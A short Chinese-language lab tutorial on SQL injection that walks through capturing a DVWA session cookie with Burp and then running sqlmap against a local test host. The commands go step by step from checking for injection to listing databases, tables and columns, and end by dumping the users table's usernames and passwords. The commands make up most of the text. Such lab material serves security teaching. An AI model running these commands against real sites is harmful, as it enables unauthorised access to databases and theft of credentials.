本次讲一下 Sql注入的基本思想和如何实现自动化注入
- Sql注入可有两个思路:①判断注入点;判断字段数;查看回显点;操作系 统或获得shell。②判断注入点,查询数据库,查询数据表,查询列名,查询列名信息。
- 演示
1.环境:kali,window2003
2.工具:sqlmap、burp
3.实验过程:
①使用burp抓取网页的cookie
②使用sqlmap查看该网站是否存在注入
sqlmap -u "http://192.168.153.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=j42udkkl7b3n86raad0tva1ta0"
③查询数据库`
sqlmap -u "http://192.168.153.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=j42udkkl7b3n86raad0tva1ta0" --dbs
④查询数据库表
sqlmap -u "http://192.168.153.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=j42udkkl7b3n86raad0tva1ta0" -D 'dvwa' --tables
⑤查询列名
sqlmap -u "http://192.168.153.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=j42udkkl7b3n86raad0tva1ta0" -D 'dvwa' -T 'users' --columns
查询列名信息
sqlmap -u "http://192.168.153.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=j42udkkl7b3n86raad0tva1ta0" -D 'dvwa' -T 'users' -C 'user,password' --dump